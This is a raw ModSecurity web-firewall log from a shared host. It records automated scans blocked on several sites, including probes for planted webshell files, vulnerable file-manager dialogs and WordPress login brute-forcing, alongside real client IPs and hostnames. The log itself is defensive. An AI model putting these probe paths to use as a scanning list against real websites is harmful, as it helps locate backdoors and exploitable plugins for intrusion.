[Tue May 26 20:01:43.266897 2026] [security2:error] [pid 106517:tid 106665] [client 103.163.220.15:55825] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/install.php"] [unique_id "ahWuz4ZZc2DoU1lPnP1zaAAAAJQ"]
[Tue May 26 20:01:43.341168 2026] [security2:error] [pid 106517:tid 106656] [client 172.225.77.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWuz4ZZc2DoU1lPnP1zXwAAAIs"]
[Tue May 26 20:01:43.486513 2026] [security2:error] [pid 106517:tid 106686] [client 178.238.226.119:55549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/includes/js/filemanager/dialog.php"] [unique_id "ahWuz4ZZc2DoU1lPnP1zcgAAAKg"]
[Tue May 26 20:01:43.693134 2026] [security2:error] [pid 112029:tid 112261] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuz6FW0C-ajaCsyFc_RgAAAXA"]
[Tue May 26 20:01:43.770580 2026] [security2:error] [pid 113091:tid 113341] [client 103.163.220.46:45259] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/accordion/"] [unique_id "ahWuz6PxBGSmlFNOy6pCyAAAAow"]
[Tue May 26 20:01:44.222559 2026] [security2:error] [pid 106517:tid 106663] [client 178.238.226.119:56204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/includes/plugins/filemanager/dialog.php"] [unique_id "ahWu0IZZc2DoU1lPnP1zigAAAJI"]
[Tue May 26 20:01:44.287989 2026] [security2:error] [pid 112029:tid 112191] [client 103.163.220.32:50785] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/assets/script-loader-react-refresh.php"] [unique_id "ahWu0KFW0C-ajaCsyFc_TAAAASo"]
[Tue May 26 20:01:44.814784 2026] [security2:error] [pid 113091:tid 113344] [client 103.163.220.24:42347] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sitemaps/"] [unique_id "ahWu0KPxBGSmlFNOy6pC3AAAAo8"]
[Tue May 26 20:01:44.836281 2026] [security2:error] [pid 106517:tid 106717] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu0IZZc2DoU1lPnP1zjgAAAMc"]
[Tue May 26 20:01:44.848321 2026] [security2:error] [pid 113091:tid 113324] [client 178.238.226.119:57201] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/js/filemanager/dialog.php"] [unique_id "ahWu0KPxBGSmlFNOy6pC3wAAAns"]
[Tue May 26 20:01:45.464596 2026] [security2:error] [pid 113091:tid 113258] [client 103.163.220.40:51845] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/shell.php"] [unique_id "ahWu0aPxBGSmlFNOy6pC-QAAAjk"]
[Tue May 26 20:01:45.547383 2026] [security2:error] [pid 106517:tid 106687] [client 178.238.226.119:58264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/js/plugins/filemanager/dialog.php"] [unique_id "ahWu0YZZc2DoU1lPnP1zrwAAAKk"]
[Tue May 26 20:01:45.964320 2026] [security2:error] [pid 113091:tid 113272] [client 103.163.220.32:33703] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/elementor/css/"] [unique_id "ahWu0aPxBGSmlFNOy6pDAQAAAkc"]
[Tue May 26 20:01:46.103665 2026] [security2:error] [pid 113091:tid 113292] [client 178.238.226.119:59209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/js/tiny_mce/plugins/filemanager/dialog.php"] [unique_id "ahWu0qPxBGSmlFNOy6pDAgAAAls"]
[Tue May 26 20:01:46.362914 2026] [security2:error] [pid 113091:tid 113215] [remote 153.122.170.42:34732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWu0qPxBGSmlFNOy6pDAwACVHs"]
[Tue May 26 20:01:46.467749 2026] [security2:error] [pid 113091:tid 113225] [client 103.163.220.37:44955] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/dist"] [unique_id "ahWu0qPxBGSmlFNOy6pDBQAAAhg"]
[Tue May 26 20:01:46.686642 2026] [security2:error] [pid 113091:tid 113242] [client 178.238.226.119:64052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/js/tinymce/plugins/filemanager/dialog.php"] [unique_id "ahWu0qPxBGSmlFNOy6pDCQAAAik"]
[Tue May 26 20:01:46.977229 2026] [security2:error] [pid 106517:tid 106671] [client 103.163.220.50:24297] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/login.php"] [unique_id "ahWu0oZZc2DoU1lPnP1z6AAAAJo"]
[Tue May 26 20:01:47.255316 2026] [security2:error] [pid 112029:tid 112185] [client 178.238.226.119:49642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/js/plugins/ckeditor/filemanager/dialog.php"] [unique_id "ahWu06FW0C-ajaCsyFc_VQAAASQ"]
[Tue May 26 20:01:47.304069 2026] [security2:error] [pid 106517:tid 106732] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu0oZZc2DoU1lPnP1z4QAAANY"]
[Tue May 26 20:01:47.477432 2026] [security2:error] [pid 106517:tid 106716] [client 103.163.220.30:51475] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sodium_compat/"] [unique_id "ahWu04ZZc2DoU1lPnP1z_gAAAMY"]
[Tue May 26 20:01:47.959529 2026] [security2:error] [pid 106517:tid 106712] [client 178.238.226.119:52478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/js/plugins/ckeditor/plugins/filemanager/dialog.php"] [unique_id "ahWu04ZZc2DoU1lPnP10EwAAAMI"]
[Tue May 26 20:01:47.971369 2026] [security2:error] [pid 113091:tid 113233] [client 103.163.220.10:50615] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/dist/vendor/about.php"] [unique_id "ahWu06PxBGSmlFNOy6pDDgAAAiA"]
[Tue May 26 20:01:48.431435 2026] [security2:error] [pid 106517:tid 106758] [client 178.238.226.119:54057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/js/ckeditor/filemanager/dialog.php"] [unique_id "ahWu1IZZc2DoU1lPnP10IwAAAPA"]
[Tue May 26 20:01:48.463047 2026] [security2:error] [pid 112029:tid 112231] [client 103.163.220.28:65099] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/pomo/"] [unique_id "ahWu1KFW0C-ajaCsyFc_XAAAAVI"]
[Tue May 26 20:01:48.961390 2026] [security2:error] [pid 106517:tid 106707] [client 178.238.226.119:55403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/js/ckeditor/plugins/filemanager/dialog.php"] [unique_id "ahWu1IZZc2DoU1lPnP10PQAAAL0"]
[Tue May 26 20:01:48.961512 2026] [security2:error] [pid 112029:tid 112277] [client 103.163.220.26:61161] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/php-compat/"] [unique_id "ahWu1KFW0C-ajaCsyFc_XQAAAYA"]
[Tue May 26 20:01:49.467063 2026] [security2:error] [pid 112029:tid 112183] [client 103.163.220.50:27399] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/customize/222.php"] [unique_id "ahWu1aFW0C-ajaCsyFc_YQAAASI"]
[Tue May 26 20:01:49.501437 2026] [security2:error] [pid 106517:tid 106716] [client 178.238.226.119:56923] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/lib/filemanager/dialog.php"] [unique_id "ahWu1YZZc2DoU1lPnP10TgAAAMY"]
[Tue May 26 20:01:49.878419 2026] [security2:error] [pid 112029:tid 112222] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu1aFW0C-ajaCsyFc_YAAAAUk"]
[Tue May 26 20:01:49.963882 2026] [security2:error] [pid 113091:tid 113298] [client 103.163.220.14:39825] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/spacer/"] [unique_id "ahWu1aPxBGSmlFNOy6pDKAAAAmE"]
[Tue May 26 20:01:50.001306 2026] [security2:error] [pid 106517:tid 106776] [client 192.42.116.144:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWu1YZZc2DoU1lPnP10WgABAlk"], referer: https://kingsclub.in/about-us
[Tue May 26 20:01:50.088932 2026] [security2:error] [pid 112029:tid 112254] [client 178.238.226.119:57921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/lib/ckeditor/filemanager/dialog.php"] [unique_id "ahWu1qFW0C-ajaCsyFc_aAAAAWk"]
[Tue May 26 20:01:50.473724 2026] [security2:error] [pid 112029:tid 112227] [client 103.163.220.50:29643] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/panel.php"] [unique_id "ahWu1qFW0C-ajaCsyFc_bQAAAU4"]
[Tue May 26 20:01:50.832492 2026] [security2:error] [pid 113091:tid 113224] [client 178.238.226.119:59057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/lib/ckeditor/plugins/filemanager/dialog.php"] [unique_id "ahWu1qPxBGSmlFNOy6pDMgAAAhc"]
[Tue May 26 20:01:50.968739 2026] [security2:error] [pid 113091:tid 113335] [client 103.163.220.39:23443] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/mediaelement/"] [unique_id "ahWu1qPxBGSmlFNOy6pDMwAAAoY"]
[Tue May 26 20:01:51.346036 2026] [security2:error] [pid 113091:tid 113286] [client 178.238.226.119:59755] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/lib/plugins/filemanager/dialog.php"] [unique_id "ahWu16PxBGSmlFNOy6pDOwAAAlU"]
[Tue May 26 20:01:51.464086 2026] [security2:error] [pid 112029:tid 112177] [client 103.163.220.15:63199] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/rest-api/endpoints/"] [unique_id "ahWu16FW0C-ajaCsyFc_dQAAARw"]
[Tue May 26 20:01:51.981480 2026] [security2:error] [pid 106517:tid 106778] [client 103.163.220.46:51105] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/customize/wp-conflg.php"] [unique_id "ahWu14ZZc2DoU1lPnP10jwAAAQQ"]
[Tue May 26 20:01:52.036543 2026] [security2:error] [pid 113091:tid 113311] [client 178.238.226.119:60447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/lib/js/filemanager/dialog.php"] [unique_id "ahWu2KPxBGSmlFNOy6pDSQAAAm4"]
[Tue May 26 20:01:52.292047 2026] [security2:error] [pid 113091:tid 113234] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu16PxBGSmlFNOy6pDQgAAAiE"]
[Tue May 26 20:01:52.453796 2026] [security2:error] [pid 106517:tid 106733] [client 114.119.155.111:52009] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jhonweb.com"] [uri "/project/advance-abilities"] [unique_id "ahWu2IZZc2DoU1lPnP10pAAAANc"], referer: https://www.jhonweb.com/project/advance-abilities
[Tue May 26 20:01:52.470121 2026] [security2:error] [pid 106517:tid 106738] [client 103.163.220.47:29865] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/pullquote/"] [unique_id "ahWu2IZZc2DoU1lPnP10pQAAANw"]
[Tue May 26 20:01:52.563928 2026] [security2:error] [pid 112029:tid 112186] [client 178.238.226.119:61040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/lib/tiny_mce/plugins/filemanager/dialog.php"] [unique_id "ahWu2KFW0C-ajaCsyFc_fAAAASU"]
[Tue May 26 20:01:52.972175 2026] [security2:error] [pid 106517:tid 106661] [client 103.163.220.39:44103] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Requests/src/Auth/"] [unique_id "ahWu2IZZc2DoU1lPnP10swAAAJA"]
[Tue May 26 20:01:53.189728 2026] [security2:error] [pid 112029:tid 112160] [client 178.238.226.119:61747] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/lib/tiny_mce/plugins/filemanager/dialog.php"] [unique_id "ahWu2aFW0C-ajaCsyFc_fwAAAQs"]
[Tue May 26 20:01:53.472851 2026] [security2:error] [pid 113091:tid 113249] [client 103.163.220.32:33743] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/wp-file-manager-pro/"] [unique_id "ahWu2aPxBGSmlFNOy6pDWQAAAjA"]
[Tue May 26 20:01:53.481447 2026] [security2:error] [pid 113091:tid 113271] [client 192.42.116.144:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWu2aPxBGSmlFNOy6pDVgACRn0"], referer: https://kingsclub.in/badminton
[Tue May 26 20:01:53.763415 2026] [security2:error] [pid 112029:tid 112224] [client 178.238.226.119:62530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/libs/plugins/filemanager/dialog.php"] [unique_id "ahWu2aFW0C-ajaCsyFc_hAAAAUs"]
[Tue May 26 20:01:53.968258 2026] [security2:error] [pid 112029:tid 112285] [client 103.163.220.40:38127] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/wp-file-manager-pro/fm_backup/"] [unique_id "ahWu2aFW0C-ajaCsyFc_hgAAAYg"]
[Tue May 26 20:01:54.415868 2026] [security2:error] [pid 106517:tid 106710] [client 178.238.226.119:63548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/libs/filemanager/dialog.php"] [unique_id "ahWu2oZZc2DoU1lPnP103wAAAMA"]
[Tue May 26 20:01:54.465360 2026] [security2:error] [pid 113091:tid 113228] [client 103.163.220.55:20559] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/cgi-bin/cgi-bin/cgi-bin/config.php"] [unique_id "ahWu2qPxBGSmlFNOy6pDYwAAAhs"]
[Tue May 26 20:01:54.742621 2026] [security2:error] [pid 112029:tid 112239] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu2qFW0C-ajaCsyFc_jwAAAVo"]
[Tue May 26 20:01:54.962560 2026] [security2:error] [pid 112029:tid 112249] [client 103.163.220.21:50043] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/system.php"] [unique_id "ahWu2qFW0C-ajaCsyFc_lQAAAWQ"]
[Tue May 26 20:01:54.999380 2026] [security2:error] [pid 113091:tid 113273] [client 178.238.226.119:64502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/libs/tiny_mce/plugins/filemanager/dialog.php"] [unique_id "ahWu2qPxBGSmlFNOy6pDbQAAAkg"]
[Tue May 26 20:01:55.462391 2026] [security2:error] [pid 106517:tid 106675] [client 103.163.220.14:54895] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/fonts/lato/"] [unique_id "ahWu24ZZc2DoU1lPnP10-QAAAJ4"]
[Tue May 26 20:01:55.564064 2026] [security2:error] [pid 106517:tid 106772] [client 178.238.226.119:65476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/libs/js/filemanager/dialog.php"] [unique_id "ahWu24ZZc2DoU1lPnP10_QAAAP4"]
[Tue May 26 20:01:55.959292 2026] [security2:error] [pid 106517:tid 106777] [client 103.163.220.53:61541] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/backup.php"] [unique_id "ahWu24ZZc2DoU1lPnP11CQAAAQM"]
[Tue May 26 20:01:55.961197 2026] [security2:error] [pid 112029:tid 112210] [client 162.243.41.33:53076] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWu26FW0C-ajaCsyFc_ngAAAT0"]
[Tue May 26 20:01:56.095764 2026] [security2:error] [pid 113091:tid 113218] [remote 132.148.72.88:54684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWu26PxBGSmlFNOy6pDewACb34"]
[Tue May 26 20:01:56.162387 2026] [security2:error] [pid 106517:tid 106711] [client 178.238.226.119:50186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/new/filemanager/dialog.php"] [unique_id "ahWu3IZZc2DoU1lPnP11EwAAAME"]
